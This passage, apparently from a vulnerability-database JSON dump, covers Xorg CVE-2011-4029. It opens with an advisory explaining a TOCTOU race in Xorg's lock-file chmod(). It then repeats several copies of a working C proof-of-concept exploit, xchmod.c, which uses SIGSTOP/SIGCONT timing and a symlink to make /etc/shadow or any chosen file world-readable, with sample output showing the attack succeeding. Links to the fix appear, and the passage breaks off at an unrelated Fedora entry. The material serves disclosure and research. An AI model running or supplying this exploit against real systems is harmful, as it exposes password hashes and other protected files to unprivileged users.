O_WRONLY, 0644); \n308 if (lfd < 0) \n309 sleep(2); \n310 else \n311 break; \n312 } while (i < 3); \n313 } \n314 if (lfd < 0) \n315 FatalError(\"Could not create lock file in %s\\n\", tmp); \n316 (void) sprintf(pid_str, \"%10ld\\n\", (long)getpid()); \n317 (void) write(lfd, pid_str, 11); \n318 (void) chmod(tmp, 0444); \n319 (void) close(lfd); \n320 \n[...] \n328 haslock = (link(tmp,LockFile) == 0); \n329 if (haslock) { \n330 /* \n331 * We're done. \n332 */ \n333 break; \n334 } \n335 else { \n336 /* \n337 * Read the pid from the existing file \n338 */ \n339 lfd = open(LockFile, O_RDONLY); \n340 if (lfd < 0) { \n341 unlink(tmp); \n342 FatalError(\"Can't read lock file %s\\n\", LockFile); \n343 } \n[...] \n \nAs a reminder, chmod() operates on filenames rather than on file handles. \nSo in this case, at line 318, there is no guarantee that the file \n\"/tmp/.tXn-lock\" still refers to the same file on disk that it did when it \nwas opened via the open() call. See TOCTOU vulnerability explained on \nOWASP[1] for more informations. \n \nThe idea here is to remove and replace (by a malicious symbolic link), the \n\"tmp\" file (\"/tmp/.tXn-lock\") between the call to open() at line 296 and \nthe call to chmod() at line 318. But for a non-root user, removing this \nfile looks impossible as it is located in a sticky bit directory (\"/tmp\") \nand owned by root. \n \nBut, what if we launch two Xorg processes with an initial offset (few \nmilliseconds) so that the first process unlink() (line 341) the \"tmp\" file \nright before the second process calls chmod()? This race condition would \nconsists in placing unlink() between open() and chmod(). It sounds very \ndifficult because there is only one system call between them (and maybe not \nenough time to perform unlink() and create our symbolic link): \n \n# strace X :1 \n[...] \nopen(\"/tmp/.tX1-lock\", O_WRONLY|O_CREAT|O_EXCL, 0644) = 0 \nwrite(0, \" 2192\\n\", 11) = 11 \nchmod(\"/tmp/.tX1-lock\", 0444) = 0 \n \nAnyway, we can make this possible by sending signals SIGCONT and SIGSTOP[2] \nto our process. As they are not trapped by the program, they will allow us \nto control and regulate (by stopping and resuming) the execution flow. \n \nHere is how to proceed: \n \n1) launch the X wrapper (pid=n) \n2) stop it (by sending SIGSTOP to 'n') rigth after \"/tmp/.tX1-lock\" is \ncreated (this actually means that the next instruction is chmod()) \n3) launch another X process to unlink() /tmp/.tX1-lock \n4) create the symbolic link \"/tmp/.tX1-lock\" -> \"/etc/shadow\" \n5) send SIGCONT to 'n' to perform chmod() on our link \n \nThe minor problem is that when launching X several times (for race \npurpose), it makes the console switch between X and TTY, and in some cases, \nit freezes the screen and disturbs the attack. The solution is to make X \nexit before it switches by creating a link \"/tmp/.Xn-lock\" (real lock \nfilename) to a file that doesn't exist. This will make the open() call \nfails at line 339, and quit with FatalError() at 342. \n \nSo before our 5 steps, we just need to add: \n \n0) create the symbolic link \"/tmp/.X1-lock\" -> \"/dontexist\" \n \n \nProof Of Concept \n---------------- \n \n/* xchmod.c -- Xorg file permission change vulnerability PoC \n \nThis PoC sets the rights 444 (read for all) on any file specified as \nargument (default file is \"/etc/shadow\"). Another good use for an \nattacker would be to dump an entire partition in order to disclose its \nfull content later (via a \"mount -o loop\"). Made for EDUCATIONAL \nPURPOSES ONLY! CVE-2011-4029 has been assigned. \n \nIn some configurations, this exploit must be launched from a TTY \n(switch by typing Ctrl-Alt-Fn). \n \nTested on Debian 6.0.2 up to date with X default configuration issued \nfrom the xserver-xorg-core package (version 2:1.7.7-13). \n \nCompile: cc xchmod.c -o xchmod \nUsage: ./xchmod [/path/to/file] (default file is /etc/shadow) \n \n$ ls -l /etc/shadow \n-rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow \n$ ./xchmod \n[+] Trying to stop a Xorg process right before chmod() \n[+] Process ID 4134 stopped (SIGSTOP sent) \n[+] Removing /tmp/.tX1-lock by launching another Xorg process \n[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow) \n[+] Process ID 4134 resumed (SIGCONT sent) \n[+] Attack succeeded, ls -l /etc/shadow: \n-r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow \n \n----------------------------------------------------------------------- \n \n\"THE BEER-WARE LICENSE\" (Revision 42): \n<vladz@devzero.fr> wrote this file. As long as you retain this notice \nyou can do whatever you want with this stuff. If we meet some day, and \nyou think this stuff is worth it, you can buy me a beer in return. -V. \n*/ \n#include <sys/types.h> \n#include <sys/stat.h> \n#include <fcntl.h> \n#include <unistd.h> \n#include <stdio.h> \n#include <syscall.h> \n#include <signal.h> \n#include <string.h> \n#include <stdlib.h> \n \n \n#define XORG_BIN \"/usr/bin/X\" \n#define DISPLAY \":1\" \n \n \nchar *get_tty_number(void) { \nchar tty_name[128], *ptr; \n \nmemset(tty_name, '\\0', sizeof(tty_name)); \nreadlink(\"/proc/self/fd/0\", tty_name, sizeof(tty_name)); \n \nif ((ptr = strstr(tty_name, \"tty\"))) \nreturn ptr + 3; \n \nreturn NULL; \n} \n \nint launch_xorg_instance(void) { \nint child_pid; \nchar *opt[] = { XORG_BIN, DISPLAY, NULL }; \n \nif ((child_pid = fork()) == 0) { \nclose(1); close(2); \nexecve(XORG_BIN, opt, NULL); \n_exit(0); \n} \n \nreturn child_pid; \n} \n \nvoid show_target_file(char *file) { \nchar cmd[128]; \n \nmemset(cmd, '\\0', sizeof(cmd)); \nsprintf(cmd, \"/bin/ls -l %s\", file); \nsystem(cmd); \n} \n \nint main(int argc, char **argv) { \npid_t proc; \nstruct stat st; \nint n, ret, current_attempt = 800; \nchar target_file[128], lockfiletmp[20], lockfile[20], *ttyno; \n \nif (argc < 2) \nstrcpy(target_file, \"/etc/shadow\"); \nelse \nstrcpy(target_file, argv[1]); \n \nsprintf(lockfile, \"/tmp/.X%s-lock\", DISPLAY+1); \nsprintf(lockfiletmp, \"/tmp/.tX%s-lock\", DISPLAY+1); \n \n/* we must ensure that Xorg is not already running on this display */ \nif (stat(lockfile, &st) == 0) { \nprintf(\"[-] %s exists, maybe Xorg is already running on this\" \n\" display? Choose another display by editing the DISPLAY\" \n\" attributes.\\n\", lockfile); \nreturn 1; \n} \n \n/* this avoid execution to continue (and automatically switch to another \n* TTY). Xorg quits with fatal error because the file that /tmp/.X?-lock \n* links does not exist. \n*/ \nsymlink(\"/dontexist\", lockfile); \n \n/* we have to force this mask to not comprise our later checks */ \numask(077); \n \nttyno = get_tty_number(); \n \nprintf(\"[+] Trying to stop a Xorg process right before chmod()\\n\"); \nwhile (--current_attempt) { \nproc = launch_xorg_instance(); \n \nn = 0; \nwhile (n++ < 10000) \nif ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0) \nbreak; \n \nif (ret == 0) { \nsyscall(SYS_kill, proc, SIGSTOP); \nprintf(\"[+] Process ID %d stopped (SIGSTOP sent)\\n\", proc); \n \nstat(lockfiletmp, &st); \nif ((st.st_mode & 4) == 0) \nbreak; \n \nprintf(\"[-] %s file has wrong rights (%o)\\n\" \n\"[+] removing it by launching another Xorg process\\n\", \nlockfiletmp, st.st_mode); \nlaunch_xorg_instance(); \nsleep(7); \n} \n \nkill(proc, SIGKILL); \n} \n \nif (current_attempt == 0) { \nprintf(\"[-] Attack failed.\\n\"); \n \nif (!ttyno) \nprintf(\"Try with console ownership: switch to a TTY* by using \" \n\"Ctrl-Alt-F[1-6] and try again.\\n\"); \n \nreturn 1; \n} \n \nprintf(\"[+] Removing %s by launching another Xorg process\\n\", \nlockfiletmp); \nlaunch_xorg_instance(); \nsleep(7); \n \nif (stat(lockfiletmp, &st) == 0) { \nprintf(\"[-] %s lock file still here... :(\\n\", lockfiletmp); \nreturn 1; \n} \n \nprintf(\"[+] Creating evil symlink (%s -> %s)\\n\", lockfiletmp, \ntarget_file); \nsymlink(target_file, lockfiletmp); \n \nprintf(\"[+] Process ID %d resumed (SIGCONT sent)\\n\", proc); \nkill(proc, SIGCONT); \n \n/* wait for chmod() to finish */ \nusleep(300000); \n \nstat(target_file, &st); \nif (!(st.st_mode & 004)) { \nprintf(\"[-] Attack failed, rights are %o. Try again!\\n\", st.st_mode); \nreturn 1; \n} \n \n/* cleaning temporary link */ \nunlink(lockfile); \n \nprintf(\"[+] Attack succeeded, ls -l %s:\\n\", target_file); \nshow_target_file(target_file); \n \nreturn 0; \n} \n \n \nFix & Patch \n------------ \n \nA fix for this vulnerability is available and will be included in xserver \n1.11.2 and xserver 1.12. \n \nhttp://cgit.freedesktop.org/xorg/xserver/commit/?id=b67581cf825940fdf52bf2e0af4330e695d724a4 \n \nSome distros released new Xorg packages (Ubuntu, Gentoo) since others (like \nDebian) judge this as a non-critical issue: \n \nhttp://security-tracker.debian.org/tracker/CVE-2011-4029 \n \n \nFootnotes & links \n----------------- \n \n[1] https://www.owasp.org/index.php/File_Access_Race_Condition:_TOCTOU \n \n[2] http://en.wikipedia.org/wiki/SIGCONT \n\"SIGCONT is the signal sent to restart a process previously paused by \nthe SIGSTOP signal\". \n \n \n`\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/106307/xorg-poc.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:05:27", "description": "\nX.Org xorg 1.4 1.11.2 - File Permission Change", "edition": 1, "published": "2011-10-28T00:00:00", "title": "X.Org xorg 1.4 1.11.2 - File Permission Change", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4029", "CVE-2011-4613"], "modified": "2011-10-28T00:00:00", "id": "EXPLOITPACK:BB0D1D84B91708D4480C30F833A625B6", "href": "", "sourceData": "/* xchmod.c -- Xorg file permission change vulnerability PoC\n\n Author: vladz (http://vladz.devzero.fr)\n Date: 2011/12/15\n Software: www.x.org\n Version: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and\n earlier if built with the USE_CHMOD preprocessor identifier\n Tested on: Debian 6.0.2 up to date with X default configuration issued\n from the xserver-xorg-core package (version 2:1.7.7-13)\n CVEs: CVE-2011-4029 & CVE-2011-4613\n\n This PoC exploits CVE-2011-4029 to set the rights 444 (read for all) on\n arbitrary file specified as argument (default file is \"/etc/shadow\").\n It uses SIGSTOP/SIGCONT signals and the Inotify API to win the race.\n Made for EDUCATIONAL PURPOSES ONLY!\n\n On some configurations, this exploit must be launched from a TTY (switch\n by typing Ctrl-Alt-Fn). But not on Debian, because it bypasses the X\n wrapper permission thanks to CVE-2011-4613!\n\n Tested on Debian 6.0.3 up to date with X default configuration issued\n from the xserver-xorg-core package (version 2:1.7.7-13).\n\n Compile: cc xchmod.c -o xchmod\n Usage: ./xchmod [/path/to/file] (default file is /etc/shadow)\n\n $ ls -l /etc/shadow\n -rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow\n $ ./xchmod\n [+] Trying to stop a Xorg process right before chmod()\n [+] Process ID 4134 stopped (SIGSTOP sent)\n [+] Removing /tmp/.tX1-lock by launching another Xorg process\n [+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)\n [+] Process ID 4134 resumed (SIGCONT sent)\n [+] Attack succeeded, ls -l /etc/shadow:\n -r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow\n\n -----------------------------------------------------------------------\n\n \"THE BEER-WARE LICENSE\" (Revision 42):\n <vladz@devzero.fr> wrote this file. As long as you retain this notice\n you can do whatever you want with this stuff. If we meet some day, and\n you think this stuff is worth it, you can buy me a beer in return. -V.\n*/\n\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdio.h>\n#include <syscall.h>\n#include <signal.h>\n#include <string.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include <sys/inotify.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n\n#define XORG_BIN \"/usr/bin/X\"\n#define DISPLAY \":1\"\n\n\nchar *get_tty_number(void) {\n char tty_name[128], *ptr;\n\n memset(tty_name, '\\0', sizeof(tty_name));\n readlink(\"/proc/self/fd/0\", tty_name, sizeof(tty_name));\n\n if ((ptr = strstr(tty_name, \"tty\")))\n return ptr + 3;\n\n return NULL;\n}\n\n\nvoid timeout_handler() {\n\n printf(\"[-] read() timeout! \\n\");\n if (!get_tty_number())\n printf(\"Try with console ownership: switch to a TTY by using \"\n\t \"Ctrl-Alt-F[1-6] and try again.\\n\");\n else\n printf(\"Maybe inotify isn't enabled.\\n\");\n\n _exit(1);\n}\n\n\nint launch_xorg_instance(int inc) {\n int pid, newfd;\n char *opt[] = { XORG_BIN, DISPLAY, NULL };\n\n if ((pid = fork()) == 0) {\n newfd = open(\"/dev/tty\", O_RDONLY);\n dup2(newfd, 0); close(1); close(2); \n\n nice(inc); usleep(30000);\n execve(XORG_BIN, opt, NULL);\n _exit(0);\n }\n\n return pid;\n}\n\n\nvoid show_target_file(char *file) {\n char cmd[128];\n\n memset(cmd, '\\0', sizeof(cmd));\n sprintf(cmd, \"/bin/ls -l %s\", file);\n system(cmd);\n}\n\n\nint main(int argc, char **argv) {\n pid_t pid, remove_pid;\n struct stat st;\n int fd, wd, status;\n char targetfile[128], lockfiletmp[20], lockfile[20];\n\n if (argc < 2)\n strcpy(targetfile, \"/etc/shadow\");\n else\n strcpy(targetfile, argv[1]);\n\n sprintf(lockfile, \"/tmp/.X%s-lock\", DISPLAY + 1);\n sprintf(lockfiletmp, \"/tmp/.tX%s-lock\", DISPLAY + 1);\n\n if (stat(lockfile, &st) == 0) {\n printf(\"[-] %s exists, maybe Xorg is already running on this\"\n\t \" display? Choose another display by editing the DISPLAY\"\n\t \" attributes.\\n\", lockfile);\n return 1;\n }\n\n umask(077);\n signal(SIGALRM, timeout_handler);\n\n symlink(\"/dontexist\", lockfile);\n\n fd = inotify_init();\n wd = inotify_add_watch(fd, \"/tmp\", IN_CREATE);\n\n alarm(5);\n printf(\"[+] Trying to stop a Xorg process right before chmod()\\n\");\n pid = launch_xorg_instance(19);\n syscall(SYS_read, fd, 0, 0);\n syscall(SYS_kill, pid, SIGSTOP);\n alarm(0);\n\n printf(\"[+] Process ID %d stopped (SIGSTOP sent)\\n\", pid);\n\n inotify_rm_watch(fd, wd);\n\n stat(lockfiletmp, &st);\n if ((st.st_mode & 4) != 0) {\n printf(\"[-] %s file has wrong rights (%o) removing it by launching\"\n\t \" another Xorg process\\n[-] Attack failed. Try again!\\n\",\n\t lockfiletmp, st.st_mode);\n\n remove_pid = launch_xorg_instance(0);\n waitpid(remove_pid, &status, 0);\n unlink(lockfile);\n return 1;\n }\n\n printf(\"[+] Removing %s by launching another Xorg process\\n\",\n\t lockfiletmp);\n remove_pid = launch_xorg_instance(0);\n waitpid(remove_pid, &status, 0);\n\n printf(\"[+] Creating evil symlink (%s -> %s)\\n\", lockfiletmp,\n\t targetfile);\n symlink(targetfile, lockfiletmp);\n\n printf(\"[+] Process ID %d resumed (SIGCONT sent)\\n\", pid);\n kill(pid, SIGCONT);\n waitpid(pid, &status, 0);\n\n unlink(lockfile);\n\n stat(targetfile, &st);\n if (!(st.st_mode & 004)) {\n printf(\"[-] Attack failed, rights are %o. Try again!\\n\", st.st_mode);\n return 1;\n }\n\n printf(\"[+] Attack succeeded, ls -l %s:\\n\", targetfile);\n show_target_file(targetfile);\n\n return 0;\n}", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T14:37:15", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Xorg 1.4 to 1.11.2 File Permission Change PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4029", "CVE-2011-4613"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72273", "id": "SSV:72273", "sourceData": "\n /* xchmod.c -- Xorg file permission change vulnerability PoC\r\n\r\n Author: vladz (http://vladz.devzero.fr)\r\n Date: 2011/12/15\r\n Software: www.x.org\r\n Version: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and\r\n earlier if built with the USE_CHMOD preprocessor identifier\r\n Tested on: Debian 6.0.2 up to date with X default configuration issued\r\n from the xserver-xorg-core package (version 2:1.7.7-13)\r\n CVEs: CVE-2011-4029 & CVE-2011-4613\r\n\r\n This PoC exploits CVE-2011-4029 to set the rights 444 (read for all) on\r\n arbitrary file specified as argument (default file is "/etc/shadow").\r\n It uses SIGSTOP/SIGCONT signals and the Inotify API to win the race.\r\n Made for EDUCATIONAL PURPOSES ONLY!\r\n\r\n On some configurations, this exploit must be launched from a TTY (switch\r\n by typing Ctrl-Alt-Fn). But not on Debian, because it bypasses the X\r\n wrapper permission thanks to CVE-2011-4613!\r\n\r\n Tested on Debian 6.0.3 up to date with X default configuration issued\r\n from the xserver-xorg-core package (version 2:1.7.7-13).\r\n\r\n Compile: cc xchmod.c -o xchmod\r\n Usage: ./xchmod [/path/to/file] (default file is /etc/shadow)\r\n\r\n $ ls -l /etc/shadow\r\n -rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow\r\n $ ./xchmod\r\n [+] Trying to stop a Xorg process right before chmod()\r\n [+] Process ID 4134 stopped (SIGSTOP sent)\r\n [+] Removing /tmp/.tX1-lock by launching another Xorg process\r\n [+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)\r\n [+] Process ID 4134 resumed (SIGCONT sent)\r\n [+] Attack succeeded, ls -l /etc/shadow:\r\n -r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow\r\n\r\n -----------------------------------------------------------------------\r\n\r\n "THE BEER-WARE LICENSE" (Revision 42):\r\n <vladz@devzero.fr> wrote this file. As long as you retain this notice\r\n you can do whatever you want with this stuff. If we meet some day, and\r\n you think this stuff is worth it, you can buy me a beer in return. -V.\r\n*/\r\n\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <syscall.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/stat.h>\r\n#include <sys/inotify.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define XORG_BIN "/usr/bin/X"\r\n#define DISPLAY ":1"\r\n\r\n\r\nchar *get_tty_number(void) {\r\n char tty_name[128], *ptr;\r\n\r\n memset(tty_name, '\\0', sizeof(tty_name));\r\n readlink("/proc/self/fd/0", tty_name, sizeof(tty_name));\r\n\r\n if ((ptr = strstr(tty_name, "tty")))\r\n return ptr + 3;\r\n\r\n return NULL;\r\n}\r\n\r\n\r\nvoid timeout_handler() {\r\n\r\n printf("[-] read() timeout! \\n");\r\n if (!get_tty_number())\r\n printf("Try with console ownership: switch to a TTY by using "\r\n\t "Ctrl-Alt-F[1-6] and try again.\\n");\r\n else\r\n printf("Maybe inotify isn't enabled.\\n");\r\n\r\n _exit(1);\r\n}\r\n\r\n\r\nint launch_xorg_instance(int inc) {\r\n int pid, newfd;\r\n char *opt[] = { XORG_BIN, DISPLAY, NULL };\r\n\r\n if ((pid = fork()) == 0) {\r\n newfd = open("/dev/tty", O_RDONLY);\r\n dup2(newfd, 0); close(1); close(2); \r\n\r\n nice(inc); usleep(30000);\r\n execve(XORG_BIN, opt, NULL);\r\n _exit(0);\r\n }\r\n\r\n return pid;\r\n}\r\n\r\n\r\nvoid show_target_file(char *file) {\r\n char cmd[128];\r\n\r\n memset(cmd, '\\0', sizeof(cmd));\r\n sprintf(cmd, "/bin/ls -l %s", file);\r\n system(cmd);\r\n}\r\n\r\n\r\nint main(int argc, char **argv) {\r\n pid_t pid, remove_pid;\r\n struct stat st;\r\n int fd, wd, status;\r\n char targetfile[128], lockfiletmp[20], lockfile[20];\r\n\r\n if (argc < 2)\r\n strcpy(targetfile, "/etc/shadow");\r\n else\r\n strcpy(targetfile, argv[1]);\r\n\r\n sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY + 1);\r\n sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY + 1);\r\n\r\n if (stat(lockfile, &st) == 0) {\r\n printf("[-] %s exists, maybe Xorg is already running on this"\r\n\t " display? Choose another display by editing the DISPLAY"\r\n\t " attributes.\\n", lockfile);\r\n return 1;\r\n }\r\n\r\n umask(077);\r\n signal(SIGALRM, timeout_handler);\r\n\r\n symlink("/dontexist", lockfile);\r\n\r\n fd = inotify_init();\r\n wd = inotify_add_watch(fd, "/tmp", IN_CREATE);\r\n\r\n alarm(5);\r\n printf("[+] Trying to stop a Xorg process right before chmod()\\n");\r\n pid = launch_xorg_instance(19);\r\n syscall(SYS_read, fd, 0, 0);\r\n syscall(SYS_kill, pid, SIGSTOP);\r\n alarm(0);\r\n\r\n printf("[+] Process ID %d stopped (SIGSTOP sent)\\n", pid);\r\n\r\n inotify_rm_watch(fd, wd);\r\n\r\n stat(lockfiletmp, &st);\r\n if ((st.st_mode & 4) != 0) {\r\n printf("[-] %s file has wrong rights (%o) removing it by launching"\r\n\t " another Xorg process\\n[-] Attack failed. Try again!\\n",\r\n\t lockfiletmp, st.st_mode);\r\n\r\n remove_pid = launch_xorg_instance(0);\r\n waitpid(remove_pid, &status, 0);\r\n unlink(lockfile);\r\n return 1;\r\n }\r\n\r\n printf("[+] Removing %s by launching another Xorg process\\n",\r\n\t lockfiletmp);\r\n remove_pid = launch_xorg_instance(0);\r\n waitpid(remove_pid, &status, 0);\r\n\r\n printf("[+] Creating evil symlink (%s -> %s)\\n", lockfiletmp,\r\n\t targetfile);\r\n symlink(targetfile, lockfiletmp);\r\n\r\n printf("[+] Process ID %d resumed (SIGCONT sent)\\n", pid);\r\n kill(pid, SIGCONT);\r\n waitpid(pid, &status, 0);\r\n\r\n unlink(lockfile);\r\n\r\n stat(targetfile, &st);\r\n if (!(st.st_mode & 004)) {\r\n printf("[-] Attack failed, rights are %o. Try again!\\n", st.st_mode);\r\n return 1;\r\n }\r\n\r\n printf("[+] Attack succeeded, ls -l %s:\\n", targetfile);\r\n show_target_file(targetfile);\r\n\r\n return 0;\r\n}\r\n\n ", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72273"}], "exploitdb": [{"lastseen": "2016-02-02T09:03:57", "description": "Xorg 1.4 < 1.11.2 - File Permission Change PoC. CVE-2011-4029,CVE-2011-4613. Local exploit for linux platform", "published": "2011-10-28T00:00:00", "type": "exploitdb", "title": "Xorg 1.4 < 1.11.2 - File Permission Change PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4029", "CVE-2011-4613"], "modified": "2011-10-28T00:00:00", "id": "EDB-ID:18040", "href": "https://www.exploit-db.com/exploits/18040/", "sourceData": "/* xchmod.c -- Xorg file permission change vulnerability PoC\r\n\r\n Author: vladz (http://vladz.devzero.fr)\r\n Date: 2011/12/15\r\n Software: www.x.org\r\n Version: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and\r\n earlier if built with the USE_CHMOD preprocessor identifier\r\n Tested on: Debian 6.0.2 up to date with X default configuration issued\r\n from the xserver-xorg-core package (version 2:1.7.7-13)\r\n CVEs: CVE-2011-4029 & CVE-2011-4613\r\n\r\n This PoC exploits CVE-2011-4029 to set the rights 444 (read for all) on\r\n arbitrary file specified as argument (default file is \"/etc/shadow\").\r\n It uses SIGSTOP/SIGCONT signals and the Inotify API to win the race.\r\n Made for EDUCATIONAL PURPOSES ONLY!\r\n\r\n On some configurations, this exploit must be launched from a TTY (switch\r\n by typing Ctrl-Alt-Fn). But not on Debian, because it bypasses the X\r\n wrapper permission thanks to CVE-2011-4613!\r\n\r\n Tested on Debian 6.0.3 up to date with X default configuration issued\r\n from the xserver-xorg-core package (version 2:1.7.7-13).\r\n\r\n Compile: cc xchmod.c -o xchmod\r\n Usage: ./xchmod [/path/to/file] (default file is /etc/shadow)\r\n\r\n $ ls -l /etc/shadow\r\n -rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow\r\n $ ./xchmod\r\n [+] Trying to stop a Xorg process right before chmod()\r\n [+] Process ID 4134 stopped (SIGSTOP sent)\r\n [+] Removing /tmp/.tX1-lock by launching another Xorg process\r\n [+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)\r\n [+] Process ID 4134 resumed (SIGCONT sent)\r\n [+] Attack succeeded, ls -l /etc/shadow:\r\n -r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow\r\n\r\n -----------------------------------------------------------------------\r\n\r\n \"THE BEER-WARE LICENSE\" (Revision 42):\r\n <vladz@devzero.fr> wrote this file. As long as you retain this notice\r\n you can do whatever you want with this stuff. If we meet some day, and\r\n you think this stuff is worth it, you can buy me a beer in return. -V.\r\n*/\r\n\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <syscall.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/stat.h>\r\n#include <sys/inotify.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define XORG_BIN \"/usr/bin/X\"\r\n#define DISPLAY \":1\"\r\n\r\n\r\nchar *get_tty_number(void) {\r\n char tty_name[128], *ptr;\r\n\r\n memset(tty_name, '\\0', sizeof(tty_name));\r\n readlink(\"/proc/self/fd/0\", tty_name, sizeof(tty_name));\r\n\r\n if ((ptr = strstr(tty_name, \"tty\")))\r\n return ptr + 3;\r\n\r\n return NULL;\r\n}\r\n\r\n\r\nvoid timeout_handler() {\r\n\r\n printf(\"[-] read() timeout! \\n\");\r\n if (!get_tty_number())\r\n printf(\"Try with console ownership: switch to a TTY by using \"\r\n\t \"Ctrl-Alt-F[1-6] and try again.\\n\");\r\n else\r\n printf(\"Maybe inotify isn't enabled.\\n\");\r\n\r\n _exit(1);\r\n}\r\n\r\n\r\nint launch_xorg_instance(int inc) {\r\n int pid, newfd;\r\n char *opt[] = { XORG_BIN, DISPLAY, NULL };\r\n\r\n if ((pid = fork()) == 0) {\r\n newfd = open(\"/dev/tty\", O_RDONLY);\r\n dup2(newfd, 0); close(1); close(2); \r\n\r\n nice(inc); usleep(30000);\r\n execve(XORG_BIN, opt, NULL);\r\n _exit(0);\r\n }\r\n\r\n return pid;\r\n}\r\n\r\n\r\nvoid show_target_file(char *file) {\r\n char cmd[128];\r\n\r\n memset(cmd, '\\0', sizeof(cmd));\r\n sprintf(cmd, \"/bin/ls -l %s\", file);\r\n system(cmd);\r\n}\r\n\r\n\r\nint main(int argc, char **argv) {\r\n pid_t pid, remove_pid;\r\n struct stat st;\r\n int fd, wd, status;\r\n char targetfile[128], lockfiletmp[20], lockfile[20];\r\n\r\n if (argc < 2)\r\n strcpy(targetfile, \"/etc/shadow\");\r\n else\r\n strcpy(targetfile, argv[1]);\r\n\r\n sprintf(lockfile, \"/tmp/.X%s-lock\", DISPLAY + 1);\r\n sprintf(lockfiletmp, \"/tmp/.tX%s-lock\", DISPLAY + 1);\r\n\r\n if (stat(lockfile, &st) == 0) {\r\n printf(\"[-] %s exists, maybe Xorg is already running on this\"\r\n\t \" display? Choose another display by editing the DISPLAY\"\r\n\t \" attributes.\\n\", lockfile);\r\n return 1;\r\n }\r\n\r\n umask(077);\r\n signal(SIGALRM, timeout_handler);\r\n\r\n symlink(\"/dontexist\", lockfile);\r\n\r\n fd = inotify_init();\r\n wd = inotify_add_watch(fd, \"/tmp\", IN_CREATE);\r\n\r\n alarm(5);\r\n printf(\"[+] Trying to stop a Xorg process right before chmod()\\n\");\r\n pid = launch_xorg_instance(19);\r\n syscall(SYS_read, fd, 0, 0);\r\n syscall(SYS_kill, pid, SIGSTOP);\r\n alarm(0);\r\n\r\n printf(\"[+] Process ID %d stopped (SIGSTOP sent)\\n\", pid);\r\n\r\n inotify_rm_watch(fd, wd);\r\n\r\n stat(lockfiletmp, &st);\r\n if ((st.st_mode & 4) != 0) {\r\n printf(\"[-] %s file has wrong rights (%o) removing it by launching\"\r\n\t \" another Xorg process\\n[-] Attack failed. Try again!\\n\",\r\n\t lockfiletmp, st.st_mode);\r\n\r\n remove_pid = launch_xorg_instance(0);\r\n waitpid(remove_pid, &status, 0);\r\n unlink(lockfile);\r\n return 1;\r\n }\r\n\r\n printf(\"[+] Removing %s by launching another Xorg process\\n\",\r\n\t lockfiletmp);\r\n remove_pid = launch_xorg_instance(0);\r\n waitpid(remove_pid, &status, 0);\r\n\r\n printf(\"[+] Creating evil symlink (%s -> %s)\\n\", lockfiletmp,\r\n\t targetfile);\r\n symlink(targetfile, lockfiletmp);\r\n\r\n printf(\"[+] Process ID %d resumed (SIGCONT sent)\\n\", pid);\r\n kill(pid, SIGCONT);\r\n waitpid(pid, &status, 0);\r\n\r\n unlink(lockfile);\r\n\r\n stat(targetfile, &st);\r\n if (!(st.st_mode & 004)) {\r\n printf(\"[-] Attack failed, rights are %o. Try again!\\n\", st.st_mode);\r\n return 1;\r\n }\r\n\r\n printf(\"[+] Attack succeeded, ls -l %s:\\n\", targetfile);\r\n show_target_file(targetfile);\r\n\r\n return 0;\r\n}\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18040/"}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2895", "CVE-2011-4028", "CVE-2013-4396", "CVE-2013-6462", "CVE-2014-0209", "CVE-2014-0210", "CVE-2014-0211", "CVE-2014-8092", "CVE-2014-8093", "CVE-2014-8095", "CVE-2014-8096", "CVE-2014-8097", "CVE-2014-8098", "CVE-2014-8099", "CVE-2014-8100", "CVE-2014-8101", "CVE-2014-8102", "CVE-2015-0255"], "description": "NX is a software suite which implements very efficient compression of the X11 protocol. This increases performance when using X applications over a network, especially a slow one. This package provides the core nx-X11 libraries customized for 